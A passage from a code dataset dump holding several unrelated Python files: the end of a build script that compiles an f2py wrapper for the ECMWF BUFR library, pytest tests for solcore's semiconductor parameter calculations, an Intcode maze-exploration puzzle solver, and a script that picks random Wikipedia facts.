LibraryBuildError\n # #]\n\n if not remake:\n # #[ copy the bufr tables\n # copy the directory holding the provided\n # BUFR tables, to a more convenient location\n # (don't move it since this will mess-up the build system\n # for library versions 000388 and above when trying\n # to do a rebuild.)\n fullname_table_dir = os.path.join(source_dir, \"bufrtables\")\n table_dir = 
\"ecmwf_bufrtables\"\n #shutil.copytree(fullname_table_dir, table_dir)\n os.mkdir(table_dir)\n symlink_to_all_files(fullname_table_dir, table_dir)\n\n # remove some excess files from the bufr tables directory\n # that we don't need any more (symlinks, tools)\n #tdfiles = os.listdir(table_dir)\n #for tdfile in tdfiles:\n # fullname = os.path.join(table_dir, tdfile)\n # if os.path.islink(fullname):\n # os.unlink(fullname)\n # else:\n # ext = os.path.splitext(tdfile)[1]\n # if not ext.upper() == \".TXT\":\n # os.remove(fullname)\n # else:\n # ensure_permissions(fullname, 'r')\n\n # select the newest set of tables and symlink them\n # to a default name (making sure a matching C table\n # is provided as well)\n pattern = os.path.join(table_dir, 'C0*098*.TXT')\n c_tables = glob.glob(pattern)\n # print('pattern = ',pattern)\n # print('c_tables = ',c_tables)\n\n if len(c_tables) > 0:\n c_tables.sort()\n # assume the highest numbered table is the most recent one\n ct_file = os.path.split(c_tables[-1])[1]\n ct_base, ct_ext = os.path.splitext(ct_file)\n newest_table_code = ct_base[1:]\n newest_c_table = ct_file\n newest_b_table = 'B'+newest_table_code+ct_ext\n newest_d_table = 'D'+newest_table_code+ct_ext\n\n default_b_table = 'B_default.TXT'\n default_c_table = 'C_default.TXT'\n default_d_table = 'D_default.TXT'\n\n current_path = os.getcwd()\n os.chdir(table_dir)\n os.symlink(newest_b_table, default_b_table)\n os.symlink(newest_c_table, default_c_table)\n os.symlink(newest_d_table, default_d_table)\n os.chdir(current_path)\n else:\n print('WARNING: no default table B, C and D found')\n # #]\n\n # #[ some old notes\n\n # save the settings for later use\n #self.make_settings = (arch, cname, r64, a64)\n #self.compilers = (fcmp, fflags, ccmp, cflags)\n #self.tools = (ar, rl)\n\n # actually, this saving of settings is not the way I would\n # prefer doing this. I think it is better to keep the 2 stages\n # (installation of the BUFR library, and generation of the\n # python interface shared object) as separate as possible.\n # This allows rerunning generation of the python interface\n # without rerunning the installation of the BUFR library\n # (which will at least save a lot of time during development)\n #\n # So the generate_python_wrapper routine should just\n # read the config file generated above, and not use these\n # settings in self, that might not always be defined.\n # #]\n\n # #]\n def check_presence(self, command):\n # #[\n \"\"\" a method to check for the presence of executable commands\n from a user shell (using the which command) \"\"\"\n\n if self.verbose:\n print(\"checking for presence of command: \"+str(command))\n\n if command == None:\n return False\n\n # get the real command, in case it was an alias\n cmd = \"which \"+command\n lines_stdout = run_shell_command(cmd, catch_output=True)[0]\n\n if len(lines_stdout) == 0:\n # command is not present in default path\n return False\n else:\n # command is present in default path\n return True\n # #]\n def generate_python_wrapper(self, source_dir, remake=False):\n # #[\n \"\"\" a method to call f2py to create a wrapper between the fortran\n library code and python. 
\"\"\"\n\n # #[ some settings\n signatures_filename = \"signatures.pyf\"\n f2py_tool_name = 'python3 ./run_f2py_tool.py'\n\n #f2py_tool_name = 'f2py'\n #os.system('chmod u+x '+f2py_tool_name)\n\n # open the config file used for building the ECMWF BUFR library\n config_file = os.path.join(self.ecmwf_bufr_lib_dir, \"config_file\")\n lines = open(config_file).readlines()\n\n # extract which fortran compiler is used\n fortran_compiler = 'undefined'\n fortran_compiler_flags = 'undefined'\n for line in lines:\n parts = line.split('=')\n if parts[0].strip() == \"FC\":\n fortran_compiler = parts[1].strip()\n if parts[0].strip() == \"FFLAGS\":\n fortran_compiler_flags = parts[1].strip()\n\n # apply ld_library path settings\n libpath = \"\"\n if self.fortran_ld_library_path != None:\n libpath = \";\".join(s for s in\n [libpath, self.fortran_ld_library_path]\n if s != \"\")\n if self.c_ld_library_path != None:\n libpath = \";\".join(s for s in\n [libpath, self.c_ld_library_path]\n if s != \"\")\n # #]\n\n if not remake:\n # #[ create signature file\n # just take them all (this works for me)\n source_file_list = source_dir+\"/bufrdc/*.F \"+\\\n source_dir+\"/pbio/pbbufr.F\"\n\n # call f2py and create a signature file that defines the\n # interfacing to the fortran routines in this library\n cmd = (f2py_tool_name+\n \" --overwrite-signature \"+\n \" --build-dir \"+self.wrapper_build_dir+\n \" -m \"+self.wrapper_module_name+\n \" -h \"+signatures_filename+\n \" \"+source_file_list)\n\n #if not self.verbose:\n cmd += \" 2>1 > f2py_build.log\"\n\n if libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n # (lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, catch_output = True)\n else:\n print(\"Using LD_LIBRARY_PATH setting: \", libpath)\n # (lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, libpath = libpath,\n # catch_output = True)\n run_shell_command(cmd, libpath=libpath, catch_output=False)\n\n # safety check: see if the signatures.pyf file really is created\n signatures_fullfilename = os.path.join(self.wrapper_build_dir,\n signatures_filename)\n if not os.path.exists(signatures_fullfilename):\n print(\"ERROR: build of python wrapper failed\")\n print(\"the signatures file could not be found\")\n raise InterfaceBuildError\n\n if self.verbose:\n # display signatures file since it seems not\n # possible to extract it from the github workflow\n fd_sig = open(signatures_fullfilename, 'rb')\n text = fd_sig.read()\n print('Starting dump of ', signatures_fullfilename)\n print(text)\n print('End of dump of ', signatures_fullfilename)\n fd_sig.close()\n\n # adapt the signature file\n # this is needed, since the wrapper generation fails to do a number\n # of file includes that are essential for the interface definition\n # To circumvent this, remove the not-properly defined constants\n # and replace them by their numerical values\n # (maybe there is a more clever way to do this in f2py, but I have\n # not yet found another way ...)\n adapt_f2py_signature_file(signatures_fullfilename,\n self.integer_sizes, self.set_jelem,\n verbose=self.verbose)\n # #]\n\n add_macosx_wrapper = False\n if add_macosx_wrapper:\n wrapper_name = generate_c_underscore_wrapper(source_dir)\n wrapper_object = os.path.splitext(wrapper_name)[0]+'.o'\n\n # compile the c wrapper code\n cmd = 'gcc -c '+wrapper_name+' -o '+wrapper_object\n os.system(cmd)\n \n # options\n # -r: insert into archive with replacement\n # -l: not used\n # -c: create the archive if it does not exist\n # -s: add/update an index 
to the archive\n # -v: verbose output\n\n # update the archive\n cmd = 'ar -rlcsv {0} {1}'.\\\n format(self.bufr_lib_file, wrapper_object)\n os.system(cmd)\n\n # #[ create the wrapper interface\n # it might be usefull for debugging to include this option: --debug-capi\n debug_f2py_c_api_option = \"\"\n if self.debug_f2py_c_api:\n debug_f2py_c_api_option = \" --debug-capi \"\n\n if self.fortran_compiler != None:\n cmd = f2py_tool_name+\\\n \" --build-dir \"+self.wrapper_build_dir+\\\n debug_f2py_c_api_option+\\\n \" --f90exec=\"+fortran_compiler+\\\n \" --f90flags='\"+fortran_compiler_flags+\"'\"+\\\n \" --f77flags='\"+fortran_compiler_flags+\"'\"+\\\n \" ./f2py_build/signatures.pyf -L./ -lbufr -c\"\n else:\n # note: adding the fortran_compiler_flags manually like this\n # causes some of them to be included twice, but this doesn't hurt,\n # and is the only way I get the automatic compilation using the\n # g95 compiler going.\n # TODO: Maybe later I could sort out how to use the python f2py\n # module in stead of the executable, and clean-up the compiler\n # flags before starting the tool\n cmd = f2py_tool_name+\\\n \" --build-dir \"+self.wrapper_build_dir+\\\n debug_f2py_c_api_option+\\\n \" --f90flags='\"+fortran_compiler_flags+\"'\"+\\\n \" --f77flags='\"+fortran_compiler_flags+\"'\"+\\\n \" --fcompiler=\"+fortran_compiler+\\\n \" ./f2py_build/signatures.pyf -L./ -lbufr -c\"\n\n if not self.verbose:\n cmd += \" 2>1 >> f2py_build.log\"\n\n if libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n #(lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, catch_output = False)\n else:\n #(lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, libpath = libpath,\n # catch_output = True)\n run_shell_command(cmd, libpath=libpath, catch_output=False)\n\n # #]\n\n # finally, again check for the presence of the wrapper\n # to see if the build was successfull\n try:\n wrapper_name = glob.glob(SO_FILE_PATTERN)[0]\n except IndexError:\n wrapper_name = 'undefined'\n\n if os.path.exists(wrapper_name):\n print(\"a python wrapper to the ECMWF BUFR library \"+\n \"has been generated\")\n return\n else:\n print(\"ERROR: build of python wrapper failed\")\n print(\"the compilation or linking stage failed\")\n raise InterfaceBuildError\n\n # #]\n def extract_constants(self):\n # #[ extract some hardcoded constants\n '''\n extract some hardcoded constants for reuse by the python code\n the ecmwfbufr interfacing is used to retrieve them,\n so this code is run when all interface building is done\n '''\n saved_cwd = os.getcwd()\n # print('saved_cwd = ', saved_cwd)\n os.chdir('..')\n sys.path = get_and_set_the_module_path(sys.path)[0]\n #(sys.path, MY_MODULE_PATH) = get_and_set_the_module_path(sys.path)\n # print('sys.path, MY_MODULE_PATH = ',sys.path, MY_MODULE_PATH)\n\n #from pybufr_ecmwf import ecmwfbufr\n import ecmwfbufr\n\n constants = ecmwfbufr.retrieve_settings()\n os.chdir(saved_cwd)\n\n keys = ['JSUP', 'JSEC0', 'JSEC1', 'JSEC2', 'JSEC3',\n 'JSEC4', 'JELEM', 'JSUBS', 'JCVAL', 'JBUFL',\n 'JBPW', 'JTAB', 'JCTAB', 'JCTST', 'JCTEXT',\n 'JWORK', 'JKEY', 'JTMAX', 'JTCLAS', 'JTEL']\n parameter_dict = {}\n for (i, key) in enumerate(keys):\n parameter_dict[key] = constants[i]\n\n python_parameter_file = 'ecmwfbufr_parameters.py'\n print('creating parameter python file: ', python_parameter_file)\n pfd = open(python_parameter_file, 'w')\n\n # write a simple doc string\n pfd.write('\"\"\"')\n pfd.write(\"\"\"\nThis is a little generated file to hold some constant parameters\ndefining all 
array sizes in the interfaces to the ecmwf library.\nThese constants are not available through the f2py interface.\nThey are defined in file:\necmwf_bufr_lib/bufr_000380/bufrdc/parameter.F\nand are extracted from that file and stored in this python\nfile for convenience\n\"\"\")\n pfd.write('\"\"\"\\n')\n\n # write the retrieved parameter values to a python file\n for (key, val) in parameter_dict.items():\n txt = key+' = '+str(val)+'\\n'\n pfd.write(txt)\n\n # add some aliasses with easier names\n aliasses = [\"LENGTH_SECTION_0 = JSEC0\",\n \"LENGTH_SECTION_1 = JSEC1\",\n \"LENGTH_SECTION_2 = JSEC2\",\n \"LENGTH_SECTION_3 = JSEC3\",\n \"LENGTH_SECTION_4 = JSEC4\",\n \"LENGTH_SUPPORT_DATA = JSUP\",\n \"LENGTH_ECMWF_KEY_DATA = JKEY\",\n \"NUM_BITS_PER_WORD = JBPW\",\n \"MAX_BUFR_MSG_LENGTH = JBUFL\",\n \"MAX_NR_TABLE_B_D_ENTRIES = JTAB\",\n \"MAX_NR_TABLE_C_ENTRIES = JCTAB\",\n \"MAX_NR_OF_EXP_DATA_DESCRIPTORS = JELEM\"]\n # JSUBS=400 # seems not used\n # JCVAL=150 # seems not used\n # JCTST=9000 # size of text tables from table C\n # JCTEXT=9000 # code table size ?\n # JWORK=4096000 # size of data buffer when encoding sec.4\n #\n # JTMAX=10 ## these 3 define the MTABP tabel dimensions\n # JTEL=255 ## used for storing BUFR tables in memory\n # JTCLAS=64 ##\n\n for alias in aliasses:\n pfd.write(alias+'\\n')\n\n pfd.close()\n\n # make sure the file is executable for all\n ensure_permissions(python_parameter_file, 'x')\n\n # #]\n def copy_sample_files(self):\n # #[ copy sample bufr files\n ''' copy sample bufr files provided by the ECMWF library\n to ensure they are available for testing, even after the\n build directory has been deleted again.\n '''\n\n swroot = get_software_root()\n source_dir = self.get_source_dir()[0]\n\n if source_dir is None:\n # this happens when the \"setup.py build\" stage has run\n # since that stage removes the library sources.\n # However, a \"setup.py install\" command reruns the build\n # and will trigger this condition.\n # No copying is needed anymore, so just return\n return\n \n data_dir = os.path.join(source_dir, 'data')\n sapp_sample_dir = os.path.join(source_dir, 'sapp_sample')\n\n target_dir = os.path.join(swroot, 'sample_bufr_files')\n if not os.path.exists(target_dir):\n os.mkdir(target_dir)\n \n for sample_dir in [data_dir, sapp_sample_dir]:\n for fn in os.listdir(sample_dir):\n src = os.path.join(sample_dir, fn)\n dst = os.path.join(target_dir, fn)\n if not os.path.exists(dst):\n #print('src: {0} dst: {1}'.format(src, dst))\n shutil.copy(src, dst)\n # #]\n\n # #]\n\nif __name__ == \"__main__\":\n print(\"Building ecmwfbufr interface:\\n\")\n # #[ make sure we are in the right directory\n BUILD_DIR = 'pybufr_ecmwf'\n os.chdir(BUILD_DIR)\n # print('cwd = ',os.getcwd())\n\n # #]\n # #[ define how to build the library and interface\n\n # instantiate the class, and build library if needed\n # (4 different tests defined for this step, with 4 different compilers)\n\n #TESTCASE = 1 # test default (=gfortran now)\n TESTCASE = 2 # test default gfortran\n #TESTCASE = 3 # test custom gfortran [broken for now]\n #TESTCASE = 4 # test custom g95-32 bit\n #TESTCASE = 5 # test custom g95-64 bit\n\n if TESTCASE == 1:\n # tested at my laptop at home with a systemwide\n # gfortran v4.7.0 installed\n # successfully tested 29-Aug-2012\n BI = InstallBUFRInterfaceECMWF(verbose=True)\n #BI = InstallBUFRInterfaceECMWF(verbose=True, debug_f2py_c_api=True)\n elif TESTCASE == 2:\n # tested at my laptop at home with a systemwide\n # gfortran v4.7.0 installed\n # successfully 
tested 29-Aug-2012\n BI = InstallBUFRInterfaceECMWF(verbose=True,\n# set_jelem=800000,\n preferred_fortran_compiler='gfortran')\n # c_flags=\"-fleading-underscore\")\n elif TESTCASE == 3:\n # note that the \"-O\" flag is allways set for each fortran compiler\n # so no need to specify it to the fortran_flags parameter.\n\n # tested at my laptop at home with a gfortran v4.4.0 installed\n # in a user account\n # successfully tested 19-Mar-2010\n # NOTE: this gfortran is no longer installed, so no new testresults\n BI = InstallBUFRInterfaceECMWF(verbose=True,\n fortran_compiler=\"/home/jos/bin/gfortran_personal\",\n fortran_ld_library_path=\"/home/jos/bin/gcc-trunk/lib64\",\n fortran_flags=\"-fno-second-underscore -fPIC\")\n elif TESTCASE == 4:\n # tested at my laptop at home with a g95 v0.92 (32-bit) installed\n # in a user account\n # successfully tested 29-Aug-2012\n BI = InstallBUFRInterfaceECMWF(verbose=True,\n fortran_compiler=\"/home/jos/bin/g95_32\",\n fortran_flags=\"-fno-second-underscore -fPIC -i4 -r8\")\n elif TESTCASE == 5:\n # tested at my laptop at home with a g95 v0.92 (64-bit)\n # installed in a user account\n # successfully tested 29-Aug-2012\n BI = InstallBUFRInterfaceECMWF(verbose=True,\n fortran_compiler=\"/home/jos/bin/g95_64\",\n fortran_flags=\"-fno-second-underscore -fPIC -i4 -r8\")\n # #]\n\n # Build ecmwfbufr interface\n BI.build()\n\n # #[ check for success\n try:\n SO_WRAPPER_NAME = glob.glob(SO_FILE_PATTERN)[0]\n except IndexError:\n SO_WRAPPER_NAME = 'undefined'\n\n if os.path.exists(SO_WRAPPER_NAME):\n print(\"successfully build:\", SO_WRAPPER_NAME)\n else:\n print(\"cannot find a file with pattern:\", SO_FILE_PATTERN)\n print(\"something seems wrong here ...\")\n raise InterfaceBuildError\n # #]\n","repo_name":"jdkloe/pybufr-ecmwf","sub_path":"build_interface.py","file_name":"build_interface.py","file_ext":"py","file_size_in_byte":90176,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"22351848689","text":"from pytest import raises, mark, approx\nfrom unittest.mock import patch, MagicMock\n\n\ndef test_eg():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import eg\n\n T = Quantity(298, \"K\")\n eg0 = Quantity(1.6, \"eV\")\n alpha = Quantity(0.1, \"meV/K\")\n beta = Quantity(600, \"K\")\n\n out = eg(T, eg0, alpha, beta)\n assert out.check(\"electron_volt\")\n assert out < eg0\n\n\n@mark.parametrize(\"fun\", [\"eg_gamma\", \"eg_x\", \"eg_l\"])\ndef test_eg_at_point(fun):\n from pint import Quantity\n\n T = Quantity(298, \"K\")\n eg0 = Quantity(1.6, \"eV\")\n alpha = Quantity(0.1, \"meV/K\")\n beta = Quantity(600, \"K\")\n mock_eg = MagicMock()\n package = \"solcore.parameter_sources.calculable_parameters\"\n\n with patch(f\"{package}.eg\", mock_eg):\n from solcore.parameter_sources.calculable_parameters import eg_gamma, eg_x, eg_l\n\n f = {\"eg_gamma\": eg_gamma, \"eg_x\": eg_x, \"eg_l\": eg_l}[fun]\n f(T, eg0, alpha, beta)\n mock_eg.assert_called_once_with(T, eg0, alpha, beta)\n mock_eg.reset_mock()\n\n\ndef test_band_gap_and_lowest_band():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import band_gap, lowest_band\n\n eg_gamma = Quantity(1.4, \"eV\")\n eg_x = Quantity(1.6, \"eV\")\n eg_l = Quantity(1, \"eV\")\n\n with raises(ValueError):\n band_gap()\n\n gap = band_gap(eg_gamma, eg_x, eg_l)\n assert eg_l == gap\n assert Quantity(\"L\", \"dimensionless\") == lowest_band(gap, eg_gamma, eg_x, eg_l)\n\n\ndef 
test_eff_mass_split_off():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import eff_mass_split_off\n\n g1 = Quantity(5.18)\n Ep = Quantity(\"18.7 eV\")\n Delta_so = Quantity(\"0.676 eV\")\n Eg = Quantity(\"1.42 eV\")\n\n out = eff_mass_split_off(g1, Ep, Delta_so, Eg)\n assert out.u == \"kilogram\"\n\n\ndef test_eff_mass_z():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import (\n eff_mass_hh_z,\n eff_mass_lh_z,\n )\n from solcore.constants import electron_mass_\n\n g1 = Quantity(5.18)\n g2 = Quantity(1.19)\n\n hh = eff_mass_hh_z(g1, g2)\n lh = eff_mass_lh_z(g1, g2)\n assert hh.u == \"kilogram\"\n assert lh.u == \"kilogram\"\n assert (electron_mass_ / lh + electron_mass_ / hh).m == approx(2 * g1.m)\n assert (electron_mass_ / lh - electron_mass_ / hh).m == approx(4 * g2.m)\n\n\ndef test_eff_mass_110():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import (\n eff_mass_hh_110,\n eff_mass_lh_110,\n )\n from solcore.constants import electron_mass_\n\n g1 = Quantity(5.18)\n g2 = Quantity(1.19)\n g3 = Quantity(1.97)\n\n hh = eff_mass_hh_110(g1, g2, g3)\n lh = eff_mass_lh_110(g1, g2, g3)\n assert hh.u == \"kilogram\"\n assert lh.u == \"kilogram\"\n assert (electron_mass_ / lh + electron_mass_ / hh).m == approx(2 * g1.m)\n assert (electron_mass_ / lh - electron_mass_ / hh).m == approx(g2.m + 3 * g3.m)\n\n\ndef test_eff_mass_111():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import (\n eff_mass_hh_111,\n eff_mass_lh_111,\n )\n from solcore.constants import electron_mass_\n\n g1 = Quantity(5.18)\n g3 = Quantity(1.97)\n\n hh = eff_mass_hh_111(g1, g3)\n lh = eff_mass_lh_111(g1, g3)\n assert hh.u == \"kilogram\"\n assert lh.u == \"kilogram\"\n assert electron_mass_ / lh + electron_mass_ / hh == approx(2 * g1.m)\n assert (electron_mass_ / lh - electron_mass_ / hh).m == approx(4 * g3.m)\n\n\ndef test_eff_mass_electron():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import eff_mass_electron\n from solcore.constants import electron_mass_\n\n F = Quantity(-0.56)\n Ep = Quantity(\"18.7 eV\")\n Delta_so = Quantity(\"0.676 eV\")\n Eg = Quantity(\"1.42 eV\")\n\n out = eff_mass_electron(F, Ep, Delta_so, Eg)\n assert out.u == \"kilogram\"\n\n out = eff_mass_electron(F, Ep * 0, Delta_so, Eg)\n assert electron_mass_ / out == (1 + 2 * F)\n\n\ndef test_permittivity():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import permittivity\n from solcore.constants import vacuum_permittivity_\n\n er = Quantity(12.5)\n out = permittivity(er)\n assert out == vacuum_permittivity_ * 12.5\n\n\nclass TestCalculableParameters:\n def test__getitem__(self):\n from solcore.parameter_sources import CalculableParameters\n from solcore.parameter import ParameterMissing\n\n cp = CalculableParameters()\n with raises(ParameterMissing):\n cp[\"param1\"]\n\n assert cp._params[\"eg_gamma\"] == cp[\"eg_gamma\"]\n\n def test___getattr__(self):\n from solcore.parameter_sources import CalculableParameters\n from solcore.parameter import ParameterMissing\n\n cp = CalculableParameters()\n with raises(ParameterMissing):\n cp.param1\n\n assert cp._params[\"eg_gamma\"] == cp.eg_gamma\n\n def test_load_source(self):\n from solcore.parameter_sources import CalculableParameters\n\n cp = CalculableParameters()\n assert cp == cp.load_source()\n\n def test_register_calculable(self):\n from solcore.parameter_sources import 
CalculableParameters\n from solcore.parameter import ParameterSourceError\n\n cp = CalculableParameters()\n assert len(cp._params) > 0\n assert tuple(cp._params.keys()) == tuple(cp._descriptions.keys())\n\n with raises(ParameterSourceError):\n\n @CalculableParameters.register_calculable\n def eg_gamma():\n pass\n\n def test_materials(self):\n from solcore.parameter_sources import CalculableParameters\n\n cp = CalculableParameters()\n cp._warned = False\n assert cp.materials == ()\n assert cp._warned\n\n def test_parameters(self):\n from solcore.parameter_sources import CalculableParameters\n\n cp = CalculableParameters()\n assert cp.parameters() == tuple((p for p in cp._params))\n\n def test_list_arguments(self):\n from solcore.parameter_sources import CalculableParameters\n\n cp = CalculableParameters()\n expected = (\"T\", \"eg0_gamma\", \"alpha_gamma\", \"beta_gamma\")\n assert cp.list_arguments(\"eg_gamma\") == expected\n\n def test_get_parameter(self):\n from solcore.parameter_sources import CalculableParameters\n from solcore.parameter import (\n InputArgumentMissing,\n Parameter,\n ParameterMissing,\n ParameterManager,\n )\n\n ParameterManager().add_source(\"Calculable\", CalculableParameters)\n ParameterManager().initialize()\n cp = CalculableParameters()\n\n @CalculableParameters.register_calculable(description=\"The answer\")\n def dummy_param():\n return 42\n\n out = cp.get_parameter(\"Dark matter\", \"dummy_param\")\n assert out.m == 42\n assert out.d == \"The answer\"\n assert out.r == (\"Calculable\",)\n\n @CalculableParameters.register_calculable(description=\"Twice the answer\")\n def dummy_param_2(dummy_param):\n return dummy_param * 2\n\n out = cp.get_parameter(\"Dark matter\", \"dummy_param_2\")\n assert out.m == 84\n assert out.d == \"Twice the answer\"\n assert out.r == (\"Calculable\",)\n\n def get_param(material, param, **kwargs):\n if param == \"param_16\":\n return Parameter(16, reference=\"SomePaper\")\n else:\n raise ParameterMissing()\n\n cp.parman.get_parameter = get_param\n\n @CalculableParameters.register_calculable(description=\"Answer is 16\")\n def dummy_param_16(param_16):\n return param_16\n\n out = cp.get_parameter(\"Dark matter\", \"dummy_param_16\")\n assert out.m == 16\n assert out.d == \"Answer is 16\"\n assert set(out.r) == {\"Calculable\", \"SomePaper\"}\n\n with raises(ParameterMissing):\n cp.get_parameter(\"Dark matter\", \"other_dummy_param\")\n\n @CalculableParameters.register_calculable(description=\"Answer is 16\")\n def dummy_param_with_T(param_16, T):\n return param_16 * T\n\n with raises(InputArgumentMissing):\n cp.get_parameter(\"Dark matter\", \"dummy_param_with_T\")\n\n # Let's get rid of all the dummies...\n dummies = (d for d in cp.parameters() if \"dummy\" in d)\n for d in dummies:\n cp._params.pop(d)\n\n\ndef test_electron_affinity():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import electron_affinity\n\n valence_band_offset = Quantity(\"-0.8 eV\")\n Eg = Quantity(\"1.42 eV\")\n electron_affinity_InSb = Quantity(\"0 eV\")\n Eg_InSb = Quantity(\"0 eV\")\n\n x = electron_affinity(valence_band_offset, Eg, Eg_InSb, electron_affinity_InSb)\n assert x == -valence_band_offset - Eg\n\n\ndef test_density_states():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import density_states\n from solcore.constants import electron_mass_\n\n T = Quantity(298, \"K\")\n mass = 0.1 * electron_mass_\n\n ds = density_states(T, mass)\n assert density_states(1.1 * T, mass).m == 
approx(ds.m * 1.1 ** (3 / 2))\n assert density_states(0.9 * T, mass).m == approx(ds.m * 0.9 ** (3 / 2))\n\n\ndef test_nc():\n from pint import Quantity\n from solcore.constants import electron_mass_\n\n T = Quantity(298, \"K\")\n mass = 0.1 * electron_mass_\n mock_density_states = MagicMock()\n package = \"solcore.parameter_sources.calculable_parameters\"\n\n with patch(f\"{package}.density_states\", mock_density_states):\n from solcore.parameter_sources.calculable_parameters import Nc\n\n Nc(T, mass)\n assert mock_density_states.call_count == 1\n\n\ndef test_nv():\n from pint import Quantity\n from solcore.constants import electron_mass_\n\n T = Quantity(298, \"K\")\n mass = 0.1 * electron_mass_\n mock_density_states = MagicMock()\n package = \"solcore.parameter_sources.calculable_parameters\"\n\n with patch(f\"{package}.density_states\", mock_density_states):\n from solcore.parameter_sources.calculable_parameters import Nv\n\n Nv(T, 2 * mass, mass)\n assert mock_density_states.call_count == 2\n\n\ndef test_ni():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import ni\n\n T = Quantity(298, \"K\")\n Nc = Quantity(1e18, \"1/cm**3\")\n Nv = Quantity(1e17, \"1/cm**3\")\n band_gap = Quantity(\"1.42 eV\")\n\n ni0 = ni(T, Nc, Nv, band_gap)\n assert ni(0.9 * T, Nc, Nv, band_gap) < ni0\n assert ni(1.1 * T, Nc, Nv, band_gap) > ni0\n assert ni(T, Nc, Nv, 0.9 * band_gap) > ni0\n assert ni(T, Nc, Nv, 1.1 * band_gap) < ni0\n","repo_name":"qpv-research-group/solcore6","sub_path":"tests/test_parameter_sources/test_calculable_parameters.py","file_name":"test_calculable_parameters.py","file_ext":"py","file_size_in_byte":10753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19561078687","text":"from src.helpers import read_comma_separated_list, plot_arr\nfrom collections import defaultdict\nfrom heapq import heappush\nfrom src.int_program import IntProgram\nfrom math import sqrt\n\n\nmove_one_step_in_direction = {\n 4: lambda i, j: (i, j+1),\n 3: lambda i, j: (i, j-1),\n 1: lambda i, j: (i-1, j),\n 2: lambda i, j: (i+1, j)\n}\n\n\nWALL = 0\nEMPTY = 1\nTARGET = 2\nUNKNOWN = 3\n\n\ndef go_to(i, j, path):\n for move in path:\n i, j = move_one_step_in_direction[move](i, j)\n return i, j\n\n\ndef get_all_moves_to_unknown_positions(i, j, path, world):\n options = []\n\n for move in move_one_step_in_direction:\n new_pos = move_one_step_in_direction[move](i, j)\n if world[new_pos] == UNKNOWN:\n options.append(path + [move])\n\n return options\n\n\ndef create_map_of_area(memory, return_shortest_path_when_found):\n world = defaultdict(lambda: UNKNOWN)\n shortest_path = None\n\n queue = [[]]\n\n while queue:\n program = IntProgram(memory)\n path = queue.pop(0)\n i, j = go_to(0, 0, path)\n\n if path:\n program.run(path)\n status = program.output[-1]\n else:\n status = EMPTY\n\n world[(i, j)] = status\n\n if status == TARGET:\n if shortest_path is None:\n shortest_path = path\n if return_shortest_path_when_found:\n return world, shortest_path\n\n if status in (EMPTY, TARGET):\n queue.extend(get_all_moves_to_unknown_positions(i, j, path, world))\n\n return world, shortest_path\n\n\ndef get_longest_path(world, start_pos):\n queue = [(start_pos, 0)]\n visited = set()\n max_depth = -1\n while queue:\n pos, depth = queue.pop(0)\n if depth > max_depth:\n max_depth = depth\n visited.add(pos)\n for move in move_one_step_in_direction:\n new_pos = move_one_step_in_direction[move](*pos)\n if (world[new_pos] in (EMPTY, TARGET)) and 
(new_pos not in visited):\n                queue.append((new_pos, depth+1))\n    return max_depth\n\n\nif __name__ == '__main__':\n    memory = read_comma_separated_list(\"oxygen_system.txt\", int)\n    program = IntProgram(memory)\n\n    world, shortest_path = create_map_of_area(memory, False)\n    start_pos = go_to(0, 0, shortest_path)\n\n    plot_arr(world)\n    print(len(shortest_path))\n    print(get_longest_path(world, start_pos))\n\n\n\n\n\n\n","repo_name":"peterts/adventofcode2019","sub_path":"src/oxygen_system.py","file_name":"oxygen_system.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1593871896","text":"import os\nimport pprint\nimport random\nimport logging\n\nimport wikipedia\n\n\ndef _parse_heading(line):\n    return \"=\" in line, line\n\n\ndef _parse_content_tree(page_content):\n    current_heading = \"None\"\n    content_tree = {current_heading: []}\n    for line in page_content.split(os.linesep):\n        if line:\n            is_heading, heading = _parse_heading(line)\n            if is_heading:\n                current_heading = heading\n                content_tree[current_heading] = []\n            else:\n                content_tree[current_heading].append(line)\n    logger.debug(pprint.pformat(content_tree))\n    return content_tree\n\n\ndef _parse_content_flat(page_content):\n    content_flat = []\n    tree = _parse_content_tree(page_content)\n    skip_sections = {\n        \"None\",\n        \"== External links ==\",\n        \"== Further reading ==\",\n        \"== Notes ==\",\n        \"== References ==\",\n        \"== See also ==\"\n    }\n\n    for title, section in tree.items():\n        if title not in skip_sections:\n            content_flat.extend(section)\n\n    return content_flat\n\n\ndef get_random_page():\n    # https://wikipedia.readthedocs.org/en/latest/quickstart.html\n    random_title = wikipedia.random(pages=1)\n    random_page = None\n    while not random_page:\n        try:\n            random_page = wikipedia.page(title=random_title)\n        except wikipedia.PageError:\n            random_title = wikipedia.random(pages=1)\n            random_page = None\n        except wikipedia.DisambiguationError as e:\n            random_title = random.choice(e.options)\n            random_page = None\n    return random_page\n\n\nlogger = logging.getLogger(__name__)\n\nmisconceptions = None\npython_facts = None\n\n\ndef get_random_misconception():\n    global misconceptions\n    if not misconceptions:\n        misconceptions = _parse_content_flat(wikipedia.page(\"List of common misconceptions\").content)\n    return random.choice(misconceptions)\n\n\ndef get_random_python_fact():\n    global python_facts\n    if not python_facts:\n        python_facts = _parse_content_flat(wikipedia.page(\"Python (programming language)\").content)\n    return random.choice(python_facts)\n\nif __name__ == \"__main__\":\n\n    logging.basicConfig(level=logging.INFO)\n    for i in range(3):\n        # fixed: python_facts is still None at this point, so random.choice(python_facts)\n   